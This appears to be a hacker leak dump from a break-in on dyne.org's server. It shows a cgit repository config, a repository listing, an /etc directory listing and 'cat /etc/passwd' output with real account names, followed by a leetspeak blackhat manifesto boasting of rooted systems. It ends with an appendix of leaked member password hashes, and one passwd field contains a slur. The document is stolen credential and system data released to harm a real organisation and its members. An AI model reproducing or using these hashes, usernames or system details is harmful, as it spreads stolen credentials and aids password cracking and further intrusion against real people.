repo.desc=autorg distributed information system
repo.path=/srv/gitosis/repositories/autorg.git
repo.owner=dyne.org
repo.defbranch=master


#repo.url=pinolo
#repo.name=pinolo
#repo.desc=pinolo the naughty chat bot
#repo.path=/srv/gitosis/repositories/pinolo.git
#repo.owner=spatof.org
#repo.defbranch=master

repo.url=dirsum
repo.name=dirsum
repo.desc=commandline tool for directory summaries
repo.path=/srv/gitosis/repositories/dirsum.git
repo.owner=dyne.org
repo.defbranch=master

repo.url=veejay
repo.name=veejay
repo.desc=Visual instrument and realtime video sampler
repo.path=/srv/gitosis/repositories/veejay.git
repo.owner=veejayhq.net
repo.defbranch=master

repo.url=devshell
repo.name=devshell
repo.desc=memoised package build management system
repo.path=/srv/gitosis/repositories/devshell.git
repo.owner=datex.nl
repo.defbranch=master


repo.url=tomb
repo.name=tomb
repo.desc=a simple commandline for encrypted storage
repo.path=/srv/gitosis/repositories/tomb.git
repo.owner=crypto.dyne.org
repo.defbranch=master

repo.url=jmx
repo.name=jmx
repo.desc=Graphical dataflow media framework
repo.path=/srv/gitosis/repositories/jmx.git
repo.owner=dyne.org
repo.defbranch=master

repo.url=synapse
repo.name=synapse
repo.desc=Advanced event framework in C++
repo.path=/srv/gitosis/repositories/synapse.git
repo.owner=syn3.nl
repo.defbranch=master

repo.url=avremote
repo.name=avremote
repo.desc=send AVTransport commands to UPNP media services
repo.path=/srv/gitosis/repositories/avremote.git
repo.owner=syncstarter.org
repo.defbranch=master

repo.url=ivysync
repo.name=ivysync
repo.desc=Video sync-starter for PAL/NTSC digital video
repo.path=/srv/gitosis/repositories/ivysync.git
repo.owner=syncstarter.org
repo.defbranch=master

repo.url=hdsync
repo.name=hdsync
repo.desc=Video sync-starter for HD digital video
repo.path=/srv/gitosis/repositories/hdsync.git
repo.owner=syncstarter.org
repo.defbranch=master

repo.url=zshaolin
repo.name=zshaolin
repo.desc=Z-sharpened console terminal for embedded
repo.path=/srv/gitosis/repositories/zshaolin.git
repo.owner=zshaolin.org
repo.defbranch=master

repo.url=jaromail
repo.name=jaromail
repo.desc=your humble and faithful electronic postman
repo.path=/srv/gitosis/repositories/jaromail.git
repo.owner=jaromil.dyne.org
repo.defbranch=master

repo.url=jaroweb
repo.name=jaroweb
repo.desc=a slick and static website publisher
repo.path=/srv/gitosis/repositories/jaroweb.git
repo.owner=jaromil.dyne.org
repo.defbranch=master


$ ls /srv/gitosis/repositories
autorg.git    infopoint.git
avremote.git    ivysync.git
battery-stats.git jaromail.git
bitcoin.git   jaroweb.git
blag.git    jmx.git
brainch.git   jrml-desk.git
demoscene.git   jrml.git
devshell.git    libdisorder.git
digitalchemy.git  manuals.git
dirsum.git    mb.git
dyne-apt.git    mifare.git
dyne-cf-repo.git  muse.git
dyne-cf.git   perl-finance-bank-ie-permanenttsb.git
dyne-search.git   perl-monit-http-api.git
dyne-web-planet.git pianeta-pirata.git
dyne-web-tmpl-muse.git  pinolo.git
dyne-web.git    postino.git
dynebolic.git   ring.git
f1x-eu.git    synapse.git
freeeee.git   tbt.git
freej-contrib.git threadgates.git
freej.git   tomb.git
frei0r.git    torrentrator.git
gginger.git   veejay.git
gitosis-admin.git vjx.git
gmusicbrowser.git welcome.html
hasciicam-2.git   wintercamp.git
hasciicam.git   zones.git
hdsync.git    zshaolin.git

$ ls -al /etc
total 964
drwxr-xr-x 102 root root 4096 Dec 21 16:06 .
drwxr-xr-x 22 root root 4096 Feb 11 2011 ..
-rw------- 1 root root 0 Sep 1 2010 .pwd.lock
-rw-r--r-- 1 root root 4636 Jan 14 2011 Muttrc
drwxr-xr-x 2 root root 4096 Feb 10 2012 Muttrc.d
drwxr-xr-x 2 root root 4096 Mar 25 2010 ODBCDataSources
drwxr-xr-x 5 root root 4096 Feb 10 2012 X11
-rw-r--r-- 1 root root 2986 Sep 1 2010 adduser.conf
-rw-r--r-- 1 root root 44 Sep 1 2010 adjtime
-rw-r--r-- 1 root root 18290 Nov 5 21:07 aliases
-rw-r--r-- 1 root root 45056 Nov 5 21:07 aliases.db
drwxr-xr-x 2 root root 4096 May 11 2012 alternatives
drwxr-xr-x 8 root root 4096 Nov 5 23:29 apache2
drwxr-xr-x 6 root root 4096 May 11 2012 apt
drwxr-xr-x 2 root root 4096 Jan 7 2011 apticron
drwxrwx--- 2 root root 4096 Feb 17 2011 backup.d
-rw-r--r-- 1 root root 2504 Oct 31 2010 backupninja.conf
-rw-r--r-- 1 root root 1657 Apr 10 2010 bash.bashrc
drwxr-xr-x 2 root root 4096 Mar 30 2012 bash_completion.d
-rw-r--r-- 1 root root 344 Jul 16 2009 bindresvport.blacklist
drwxr-xr-x 3 root root 4096 Feb 11 2011 ca-certificates
-rw-r--r-- 1 root root 6333 Nov 30 2011 ca-certificates.conf
-rw-r--r-- 1 root root 6332 Feb 11 2011 ca-certificates.conf.dpkg-old
drwxr-xr-x 2 root root 4096 Feb 10 2011 calendar
-rw-r--r-- 1 root root 5820 Oct 19 13:12 cgitrc
-rw-r--r-- 1 root root 4598 Jan 17 2012 cgitrc~
-rw-r--r-- 1 root root 3878 Feb 6 2011 cowpoke.conf
drwxr-xr-x 2 root root 4096 Nov 5 20:12 cron.d
drwxr-xr-x 2 root root 4096 Mar 10 2012 cron.daily
drwxr-xr-x 2 root root 4096 Feb 10 2011 cron.hourly
drwxr-xr-x 2 root root 4096 Feb 10 2011 cron.monthly
drwxr-xr-x 2 root root 4096 Feb 10 2011 cron.weekly
-rw-r--r-- 1 root root 724 Sep 28 2008 crontab
-rw-r--r-- 1 root root 54 May 11 2012 crypttab
drwxr-xr-x 4 root root 4096 Dec 3 11:16 dbus-1
-rw-r--r-- 1 root root 2969 Oct 12 2008 debconf.conf
-rw-r--r-- 1 root root 6 Jan 12 2012 debian_version
drwxr-xr-x 2 root root 4096 Dec 3 11:16 default
drwxr-xr-x 3 root root 4096 Feb 10 2011 defoma
-rw-r--r-- 1 root root 600 Aug 10 2008 deluser.conf
-rw-r--r-- 1 root root 17274 Jan 4 2012 devscripts.conf
drwxr-xr-x 4 root root 4096 Nov 30 2011 dhcp
drwxr-xr-x 4 root root 4096 Sep 1 2010 dhcp3
drwxr-xr-x 2 root root 4096 Jan 12 2011 dictionaries-common
drwxr-xr-x 4 root root 4096 Feb 10 2012 dpkg
drwxr-xr-x 3 root root 4096 Feb 11 2011 emacs
-rw-r--r-- 1 root root 312 Sep 30 2008 email-addresses
-rw-r--r-- 1 root root 0 Sep 1 2010 environment
drwxr-xr-x 3 root root 4096 Sep 1 2010 exim4
drwxr-xr-x 2 root root 4096 Feb 11 2011 fckeditor
drwxr-xr-x 4 root root 4096 Feb 10 2011 fonts
-rw-r--r-- 1 root root 361 Feb 1 2012 fstab
-rw-r--r-- 1 root root 142 Sep 1 2010 fstab.save
-rw-r--r-- 1 root root 130 Dec 15 2010 ftpallow
-rw-r--r-- 1 root root 132 Sep 18 2011 ftpusers
-rw-r--r-- 1 root root 2940 Jan 23 2011 gai.conf
drwxr-xr-x 5 root root 4096 Dec 3 11:15 gconf
drwxr-xr-x 3 root root 4096 Dec 3 11:16 ghostscript
drwxr-xr-x 2 root root 4096 Feb 10 2011 groff
-rw-r--r-- 1 root root 950 Dec 3 11:16 group
-rw-r--r-- 1 root root 932 Dec 1 19:13 group-
drwxr-xr-x 2 root root 4096 Nov 30 2011 grub.d
-rw-r----- 1 root shadow 779 Dec 3 11:16 gshadow
-rw-r----- 1 root shadow 764 Dec 1 19:13 gshadow-
drwxr-xr-x 2 root root 4096 Dec 3 11:16 gtk-2.0
-rw-r--r-- 1 root root 9 Aug 7 2006 host.conf
-rw-r--r-- 1 root root 15 Dec 23 2010 hostname
-rw-r--r-- 1 root root 143 Dec 20 20:17 hosts
-rw-r--r-- 1 root root 579 Sep 1 2010 hosts.allow
-rw-r--r-- 1 root root 878 Sep 1 2010 hosts.deny
-rw-r--r-- 1 root root 0 Dec 27 2010 inetd.conf
drwxr-xr-x 2 root root 4096 Dec 3 11:16 init.d
drwxr-xr-x 5 root root 4096 Feb 10 2011 initramfs-tools
-rw-r--r-- 1 root root 2351 Mar 31 2012 inittab
-rw-r--r-- 1 root root 1723 Jan 14 2009 inputrc
drwxr-xr-x 3 root root 4096 Feb 10 2011 insserv
-rw-r--r-- 1 root root 882 May 7 2010 insserv.conf
drwxr-xr-x 2 root root 4096 May 7 2010 insserv.conf.d
drwxr-xr-x 2 root root 4096 Feb 10 2011 iproute2
-rw-r--r-- 1 root root 28 Dec 14 2010 issue
-rw-r--r-- 1 root root 21 Dec 14 2010 issue.net
drwxr-xr-x 2 root root 4096 Feb 10 2011 javascript-common
drwxr-xr-x 2 root root 4096 Jan 17 2012 jed.d
drwxr-xr-x 2 root root 4096 Feb 11 2011 joe
drwxr-xr-x 4 root root 4096 Dec 27 2010 kernel
-rw-r--r-- 1 root root 29287 Dec 3 11:17 ld.so.cache
-rw-r--r-- 1 root root 52 Dec 23 2010 ld.so.conf
drwxr-xr-x 2 root root 4096 Feb 10 2012 ld.so.conf.d
-rw-r--r-- 1 root root 17 Sep 1 2010 ld.so.conf.save
drwxr-xr-x   2 root root    4096 Nov 30  2011 ldap
-rw-r--r--   1 root root    3587 Apr  9  2010 lftp.conf
drwxr-xr-x   2 root root    4096 Apr 26  2010 libpaper.d
-rw-r--r--   1 root root    2570 Jan 23  2011 locale.alias
lrwxrwxrwx   1 root root      25 Feb 10  2012 locale.gen -> /usr/share/i18n/SUPPORTED
-rw-r--r--   1 root root     118 Feb 10  2012 localtime
drwxr-xr-x   5 root root    4096 Dec 23  2010 logcheck
-rw-r--r--   1 root root   10183 Sep 26  2010 login.defs
-rw-r--r--   1 root root     599 Oct  8  2008 logrotate.conf
drwxr-xr-x   2 root root    4096 Nov  5 20:12 logrotate.d
drwxr-xr-x   2 root root    4096 Aug 18  2008 lsb-base
drwxr-xr-x   3 root root    4096 Nov  6 16:06 lurker
drwxr-xr-x   2 root root    4096 Feb 10  2011 lynx-cur
-rw-r--r--   1 root root     111 Sep  8  2008 magic
-rw-r--r--   1 root root     111 Sep  8  2008 magic.mime
-rw-r--r--   1 root root     125 Apr 27  2008 mail.rc
-rw-r--r--   1 root root    7635 Dec  3 11:17 mailcap
-rw-r--r--   1 root root     449 Jun 18  2008 mailcap.order
drwxr-xr-x   3 root list    4096 Nov  6 11:36 mailman
drwxr-xr-x   3 root list    4096 Nov  5 20:12 mailman.old
-rw-r--r--   1 root root      15 Dec 23  2010 mailname
-rw-r--r--   1 root root    5173 Jan  3  2011 manpath.config
drwxr-xr-x   2 root root    4096 Feb 11  2011 mc
-rw-r--r--   1 root root   22275 Dec  8  2009 mime.types
-rw-r--r--   1 root root     801 Jun  3  2010 mke2fs.conf
drwxr-xr-x   2 root root    4096 Feb 10  2012 modprobe.d
-rw-r--r--   1 root root     248 Sep  1  2010 modules
drwxr-xr-x   3 root root    4096 Dec  3 20:28 moin
lrwxrwxrwx   1 root root      13 Dec 16  2010 motd -> /var/run/motd
-rw-r--r--   1 root root     286 Sep  1  2010 motd.tail
-rw-r--r--   1 root root     371 Jun 14  2012 mtab
drwxr-xr-x   6 root root    4096 Feb 10  2011 munin
drwxr-xr-x   3 root root    4096 Mar 30  2012 mysql
-rw-r--r--   1 root root    8453 Apr 15  2010 nanorc
drwxr-xr-x   6 root root    4096 Sep  1  2010 network
-rw-r--r--   1 root root      60 Sep  1  2010 networks
-rw-r--r--   1 root root     475 Aug 28  2006 nsswitch.conf
-rw-r--r--   1 root root       0 Mar 25  2010 odbc.ini
drwxr-xr-x   2 root root    4096 Feb 11  2011 openoffice
drwxr-xr-x   2 root root    4096 Sep  1  2010 opt
-rw-r--r--   1 root root     552 Mar 17  2009 pam.conf
drwxr-xr-x   2 root root    4096 Dec 20  2011 pam.d
drwxr-xr-x   2 root root    4096 Dec 26  2010 pango
-rw-r--r--   1 root root       7 Feb 11  2011 papersize
-rw-r--r--   1 root root    2110 Dec  3 11:16 passwd
-rw-r--r--   1 root root    2110 Dec  3 11:16 passwd-
drwxr-xr-x   2 root root    4096 Feb 10  2012 pbuilder
-rw-r--r--   1 root root     308 Jan  4  2012 pbuilderrc
drwxr-xr-x   2 root root    4096 Mar 30  2012 pear
drwxr-xr-x   5 root root    4096 Sep  1  2010 perl
drwxr-xr-x   6 root root    4096 Aug 11  2011 php5
drwxr-xr-x   3 root root    4096 Nov  5 21:19 postfix
drwxr-xr-x   4 root root    4096 Dec 23  2010 ppp
-rw-r--r--   1 root root     475 Oct 28  2006 profile
drwxr-xr-x   2 root root    4096 Dec 14  2010 profile.d
-rw-r--r--   1 root root    2859 Jan 19  2011 protocols
drwxr-xr-x   2 root root    4096 Apr 26  2011 pulse
drwxr-xr-x   4 root root    4096 Dec 20  2011 pure-ftpd
drwxr-xr-x   2 root root    4096 Dec 23  2010 python
drwxr-xr-x   2 root root    4096 Feb 10  2011 python2.5
drwxr-xr-x   2 root root    4096 Feb 10  2011 python2.6
-rwxr-xr-x   1 root root     511 Mar 15  2012 rc.local
drwxr-xr-x   2 root root    4096 Mar 11  2012 rc0.d
drwxr-xr-x   2 root root    4096 Dec 20  2011 rc1.d
drwxr-xr-x   2 root root    4096 Dec  3 11:16 rc2.d
drwxr-xr-x   2 root root    4096 Dec  3 11:16 rc3.d
drwxr-xr-x   2 root root    4096 Dec  3 11:16 rc4.d
drwxr-xr-x   2 root root    4096 Dec  3 11:16 rc5.d
drwxr-xr-x   2 root root    4096 May 11  2012 rc6.d
drwxr-xr-x   2 root root    4096 May 11  2012 rcS.d
-rw-r--r--   1 root root      27 Dec 23  2010 resolv.conf
drwxr-xr-x   3 root root    4096 Dec 23  2010 resolvconf
-rwxr-xr-x   1 root root     268 Mar 11  2010 rmt
-rw-r--r--   1 root root     887 Aug 28  2008 rpc
-rw-r--r--   1 root root     548 Nov  1 16:25 rsyncd.conf
-rw-r--r--   1 root root     758 Mar  1  2012 rsyncd.motd
-rw-r--r--   1 root root    2572 Dec  9  2010 rsyslog.conf
drwxr-xr-x   2 root root    4096 Jun 13  2011 rsyslog.d
-rw-r--r--   1 root root    3663 May  2  2009 screenrc
-rw-r--r--   1 root root    3828 Sep 26  2010 securetty
drwxr-xr-x   4 root root    4096 Nov 30  2011 security
drwxr-xr-x   2 root root    4096 Jan 19  2012 service
-rw-r--r--   1 root root   19666 Jan 19  2011 services
drwxr-xr-x   2 root root    4096 Feb 10  2011 sgml
-rw-r-----   1 root shadow  2605 Dec  3 11:16 shadow
-rw-r-----   1 root shadow  2605 Dec  3 11:16 shadow-
-rw-r--r--   1 root root     203 Feb 11  2011 shells
drwxr-xr-x   2 root root    4096 Feb 10  2011 skel
-rw-r--r--   1 root root    1407 Mar 18  2010 slsh.rc
drwxr-xr-x   2 root root    4096 Dec  3 17:25 ssh
drwxr-xr-x   4 root root    4096 Feb 10  2012 ssl
-r--r-----   1 root root     747 May  1  2011 sudoers
drwxr-xr-x   2 root root    4096 Mar 30  2011 sudoers.d
-rw-------   1 root root     708 Apr 28  2011 sudoers.tmp~
-r--r-----   1 root root     591 Feb 11  2011 sudoers~
drwxr-xr-x   4 root root    4096 Mar 31  2012 sv
-rw-r--r--   1 root root    2416 Mar 31  2012 sysctl.conf
drwxr-xr-x   2 root root    4096 Feb 10  2011 sysctl.d
drwxr-xr-x   2 root root    4096 Feb 10  2011 terminfo
-rw-r--r--   1 root root       8 Feb 10  2012 timezone
-rw-r--r--   1 root root     645 Feb  3  2008 ts.conf
-rw-r--r--   1 root root    1260 May 30  2008 ucf.conf
drwxr-xr-x   4 root root    4096 Feb 10  2011 udev
drwxr-xr-x   3 root root    4096 Dec 23  2010 ufw
drwxr-xr-x   2 root root    4096 Apr 28  2011 vim
-rw-r--r--   1 root root    2889 Apr 20  2010 vnstat.conf
drwxr-xr-x   2 root root    4096 Dec 21 16:11 vsftpd
-rw-r--r--   1 root root       0 Dec 20  2011 vsftpd.chroot_list
-rw-r--r--   1 root root    5538 Feb  6  2012 vsftpd.conf
-rw-r--r--   1 root root    4496 Sep  6  2010 wgetrc
drwxr-xr-x   2 root root    4096 Mar 30  2011 wordpress
drwxr-xr-x   2 root root    4096 Feb 10  2011 xml
drwxr-xr-x   2 root root    4096 Feb 11  2011 zsh

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jaromil:x:1000:1000:,,,:/home/jaromil:/bin/bash
xant:x:1001:1001:,,,:/home/xant:/bin/bash
postfix:x:103:106::/var/spool/postfix:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
pallotron:x:1002:1002:,,,:/home/pallotron:/bin/bash
munin:x:105:109::/var/lib/munin:/bin/false
ram:x:1003:1003:,,,:/home/ram:/bin/bash
nightolo:x:1004:1004:,,,:/home/nightolo:/bin/bash
asbesto:x:1005:1005:,,,:/home/asbesto:/bin/bash
sand:x:1006:1006:sand,666,,:/home/sand:/bin/bash
newmark:x:1007:1007:,,,:/home/newmark:/bin/bash
calibre:x:1008:33:calibre user:/usr/local/share/calibre:/bin/sh
git:x:106:110:git repository hosting,,,:/srv/gitosis:/bin/bash
bittorrent:x:1009:1008:,,,:/home/bittorrent:/bin/bash
vlax:x:1010:1009:,,,:/home/vlax:/bin/bash
nignux:x:1011:1010:Nignux,Museo informatica,,,FROCIO:/home/nignux:/bin/bash
ftp:x:107:111:ftp daemon,,,:/srv/ftp/.anon:/bin/false
gitlog:x:108:65534::/nonexistent:/bin/false
gitdaemon:x:109:65534::/nonexistent:/bin/false
boyska:x:1013:1012:,,,:/home/boyska:/bin/bash
incoming:x:1012:1011:,,,:/home/incoming:/bin/bash
melug:x:1014:1015:,,,:/home/melug:/bin/bash
webmail:x:1015:1016:,,,:/home/webmail:/bin/bash
ezio:x:1016:1017:,,,:/home/ezio:/bin/bash
messagebus:x:110:113::/var/run/dbus:/bin/false

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~~!~!~
~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~~!~!~

                          th4tz @ll f0lkz!
k33p an 3y3 on th3 off1shul EGO n3ws s0urce: @EGOvrt 0n th3 tw1tt3rz~!
    w3 h4ve 4 fuLL pl8 0f r00tz, rm'z 4nd h4ckz f0r th3 n3w y34r!

w3 w4nt j00 2 kn0 th4t w3 d1dnt st4rt d1s w4r - w3 w1ll f1n1sh 1t.
dyne wuz 0nLy c0ll@ter4l d4mag3. jst 4 sm4ll t4st3 0f wh4t r34L bl4ckh4tz
ar3 c4pabl3 0f. th4 r3al en3my 1z th3 wh1t3hatz, th3 ant1viruz c0mpaniez,
th3 s3curity c0mpan1ez, exploit-db, bugtrack, th3 m3dia, ZDI, m3tasplo1t
@nd every1 elz wh0 uz3s th3 h4ck1ng c0mmun1ty 2 furth3r th3ir 0wn c0rrupt
ag3nda. w3 h4ve th3 p0wer t0 t4ke th3m d0wn and d1s 1z jst th3 b3g1nning..

th3 wh1t3h4tz th1nk th4t the1r full d1scl0sur3 4nd m3tasplo1t bullsh1t 1z
h4ck1ng. all 0f y3r t00lz ar3 0wned, y3r ker3nlz backd00red, th3 expl01tz
mod1fi3d, th3 v3nd0rz h4ve b33n r00ted. no1 iz s4fe.

much love: pHC, el8, dikline, #sot

                      BLEND IN.
                      GET TRUSTED.
                      TRUST NO ONE.
                      OWN EVERYONE.
                      DISCLOSRE NOTHING.
                      DESTROY EVERYONE.
                      TAKE BACK THE SCENE.

    /@@####################################################@@\
    @@                                                      @@
    @@         ##### ##       # ###            # ###        @@
    @@      ######  /### /  /  /###  /       /  /###        @@
    @@     /#   /  / ###/  /  /  ###/       /  /  ###       @@
    @@    /    /  /   ##  /  ##   ##       /  ##   ###      @@
    @@        /  /       /  ###           /  ###    ###     @@
    @@       ## ##      ##   ##          ##   ##     ##     @@
    @@       ## ##      ##   ##   ###    ##   ##     ##     @@
    @@       ## ######  ##   ##  /###  / ##   ##     ##     @@
    @@       ## #####   ##   ## /  ###/  ##   ##     ##     @@
    @@       ## ##      ##   ##/    ##   ##   ##     ##     @@
    @@       #  ##       ##  ##     #     ##  ##     ##     @@
    @@          /         ## #      /      ## #      /      @@
    @@      /##/         / ###     /        ###     /       @@
    @@     /  ##########/   ######/          ######/        @@
    @@          ######        ###              ###          @@
    \@@####################################################@@/

~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~~!~!~
~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~~!~!~
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                                             



@ppendix:

dyne.0rg full m3mbr hash l1st:

AR7egRF39D7OvRXqFyyLDhyfWdXjJBGtf6EjCmfZS9H1O1Eiz3nWuQ==
tjp8QT8S3Gzg/BEaKJS/xJNReSo=
8EP/K23fGJLzS2lerqTtBfbc9l0=
I94kr3fx1cT9rPkK4GzwwQMgcJs=
JLHRmReSgNwGveUdQ1YfpAZf8EQq1/MmBB5fkHrsJYRXUyJPz/9dkA==
zf3lNzsbKIURW68MtnAb7wZOTdE=
I2mtVxKCxfR1y0a4QvuxCjaRJ2I=
MD3Zn08sqzl8CCetROVZ2smgVD0=
W5KMMUq5YNddMwEY0hF3g/8ECm4At/0ClbSTLrBztWNSqu9jf/R4fQ==
9Kv4kmS8LVKwwOBXirL4Y7R8Pzm+sR916A9RaL+D96H10iTHzvZ3WA==
zEtPPHn09vgu/Tn8wMoZ2tDA7nGpFxP5tfoZMASo4bVdCScC+4K2JA==
1DLDUludCEuQMxu/eonMHr5YmYw=
G38/F7JD6sXPQCIC+WPsRXqeBpo=
4WlASkSktlCe8IwKGW0bbvxQAX0=
a4YQnsYkiaYI5JNZR30/gOUMk5s=
qmjIznickMBSUmsi53eaIKD4YX8=
Er5oz2reqHNxVc0J6T5yxTkKXmE=
gsZ1BHlMJKCATdqCQNQctjjMffo=
Owea0a5LAYs9NSFKiGAuP5AZNiA=
8tup/z8tGCnVAAOLlpM+NmzFYe0=
o8tPIWAkBmivhNvwivTsSV4Z038=
0dSyJGFFh0CI1hVbqrxznAnHUGg=
+WSDAEHn9uc1KDcghbo8uMJxfhs=
tSLrrr0H7233YnE6Rvuek0X1C2Y=
DEUArv0CKazJSQWos2olSlOVd14=
iQF+ZST6gXXjlkr6Z8HNPWNWKb0=
oDbUh1HuZ4nojq+QSt+E7dmE5V8=
oX2pB+kgrDEytFmkaGZJOfR2o38=
TfFIIeHgpYrLQDXPSocVfzWkxhxqAPHde0aUOrTIjrcI9y1cdPwU0Q==
3y2prtqXIIitKoTQVX1cvDGwW/U=
qjhyT2fGisN9kGfHUY0kPbfO6z4=
lCJTYgH5/HUTDjhlJKhx5avEfbs=
4sfn6lE4zUw4SXOincmgmMHWiCoQTP9dyg2tmlL2+PYZgC+t0y586A==
2faqT+w9s4vPyqZLtk49DRdduvzwa5YVoQFv3UDbBBx654WzBbpH6Q==
kXCXxR+V1SuJZ/pekrfrGjr4+wg=
izTjuqgsZI4Y8Lpaw8B02t1ucAJJZIb63Ko3wV8V9CUe3ePk/8is/w==
pj+cYb365utBzGHsY4WFVBMpizg=
yXhcvCIxaGw6eM7UODQhmejhHpkpg1RQTzBycYb3ONXLdbZgwNMCdg==
qzeLgKikqvq6x9t64WnyV5bmWZQ=
hll9Dmaa5WFQp51bCmh0ZgcAZ+8=
bLbaON1L9qmCNyOlsAdOED6UNHY=
I94kr3fx1cT9rPkK4GzwwQMgcJs=
yEKNE+gnQPSaTNX2+UKYZX8qLI8=
yMKqItIaLB4WPlQ8gN0281yUD3E=
k8H6f76ngA+X3E7lS++yyn3riwc=
OigtpEssWeEroXj2Mk5YMrX8dHM=
dA+5GrroCWEqYFgYLEsSa/8DMS4=
MKB3bPT2tJk9B0NkT8V9A2gIBTU=
qCDGOT26/NWmp1JepmYHOOzXWFs=
ZfLZqfF1VaWBPtivcIY1l/jf9hg=
uH6dherhWWgrNDzKmK+vrzbUOUA=
STTxzOZ+3rwh2aAJPw8S7xSbwtc=
+1h+Nuw3czDoqWIoJh8Dx0WnXNI=
5Jg7vRIuisqPRM+njwxIsxVtTAs=
Ro+tthOeq160wDm4c3Nd735EEnM=
ujJMp7HHf8ILuXDVr/buqTd5GKU=
GMrp+u65uZtWUXUvgEqULsd1bag=
tleXwBxwlRoILOqXKw3TK+MDmzY=
LpK8ApvNRrlLXXeQjFG8ny/a9ys=
CnjHnvzqJUUs0711OuysVnukysY=
O0ihUOKKBrNQmLYt7p2rrL0coJg=
bJ9cMNZxHeuzhEIs+C7OG01ffp3GalEuiBzU2EHNWHqqxxqiJSOA0Q==
DPIs0ZBbP8cEDg9tqG9xIBWJVhk=
7r22uGb966z7A9YPkaq/O/8mZR0=
5+Ndl7f1pMH6BYQEcLdVnfaJC4I=
SBGXAiVwfixLcp+CxhwwQ6gjAGojlWdw5mgk7cbNDdpQlJnO0VFgFQ==
LbB7AAU3PTq52dYo3RBWzvEZnsw=
CHvUohKNqraW/22I4jpWL+1u0ro=
5Jg7vRIuisqPRM+njwxIsxVtTAs=
bRByhvdSgHc1ytcCnI++otJtRV8=
xf6SRH+/blgCEfTT8YYAKRL2sfA=
PJ3wn667sRIspXBYGyxK2PS87Xw=
Dfz+mSjNP5Z/9kn4uPHjJBCuO6M=
s/uy3pJYzqN9Crvk8r1LILBrevNCdZS09sM5ltxJvJVJCpCAa86Z3Q==
rympWmln2wk6sE0NJIxbxWSIt7w=
bqiGlAInjomRmVSQSwNpgTvd7Lc=
9UjwAtcjpLUcnJ4REee2pCx3eag=
UmJB+AedqOlNGSiwydNv+EFwDPU=
B9hzrPEetH/yT/6QKY38ZTXu52Q=
FOEIP/qsObYaVqtZFdPn13dGxHc=
JOdFHfBe1c1M8QQb5nxo+NidCHo=
IEDc9zfyOrSq3lqoiRJSvmN/FjL0Tfx/c8MgzQbOuL/Eh1jlkVu/Tw==
vr1dmWiSRtK0JfoVS05eVpxQR64=
wNKrbDpDviKw2d4W84yynjqnl68=
DWJzQuRfaYiOMc5s5vh55LY0IRM=
MrJqJxUw8QXLw1y2UxEOGknQGbY=
W6ph5Mm5Pz8GgiULbPgzG37mj9g=
Lx3ZXDnzZ40FWkAOkGC6VEPu0Ic=
BMEkpxddyv+NYsS/42xntxAOANA=
Fl084f7RTZ74XfscLnyuOSF5aBQ=
rgGhbOs2ayrQmcsy4bmeLWdxkOEkXUvbh7rxr1PPgI/fn8Q12c+62A==
7c3wudxW+Uv5GnLnA+/nwwHXITw=
WljYSCBL0RfnjvEc7tEgqe9QVd0=
goVhRj0x2Z4bH3KSCT3TJ8fBOWA=
AXDxd9pZnSt2m0LdJe6hDwXe2Sg=
mL6ebPw+TZ/Pitpta6yLEOvz6k4=
VwdqyqxYdp08ed2oNxH4FM7vClA=
DK5Qtod7zQjUKoLsBsfFcbpJSzU=
CfROGYnJHfrPZnj0UHKPAyobLd0=
vActKTyj3GLSpDOWY5NPx1EBY7E=
cFsTgovODX4GefHTzLDyPEQshdI=
+8hipqh6xI4ryc9R77kAs+6pCbQ=
WRsIgnit1ve2e6n6dT7kUGeHruU=
fCIvspJ9goryL1khNOiTJIBjfA0=
8didAqdmWGwgntRQeqluLCqRVr0=
Tj/jROJJc+io328+Vq274LAxg+A=
vVSrgRJkxFAJbIHzKDW7fXwYCCQ=
RfBJXmb+uZKn8b1n1eoDVI2B4og=
7zBV/u9vIsdb2d/3KUUTx9tHqwI=
n3qCLVim3ZL12bPmCwXPlogZ7T4=
oXUY2qYCzS3yYqHKM7dTrO2+als=
WpnnVNqnquLbdl93SqDK58k6ga0=
OG83ahwQSHtayBH12n+GpXWqLos=
KWcsDz/VgifdZqyHK0qovxZJdx8=
Au3s352/szeu72P4ubPv2lWqcUc=
UMGV6NDa36gS49tbxRBwxOD+270=
tw9lsyNAmAjyF5OCRPOLFYDpQAI=
UmaJyVWLRG5jC9LIH+Ers5BA2wY=
84Q0BRgii32TesD6KyLhDROukGY=
8ChHYCTNJQ7ULBWU/YS4/YVMeqE=
XiyeO40d2eg8Xxy+Cr5dcqvLchk=
ejjYy9INmTK6lI76o2S7YmUdWtQ=
oZd8XWMjntJdQH73/ZLS8Z04W7w=
ywe2Eyv0WjK4OsPX4ARkA9CdN1I=
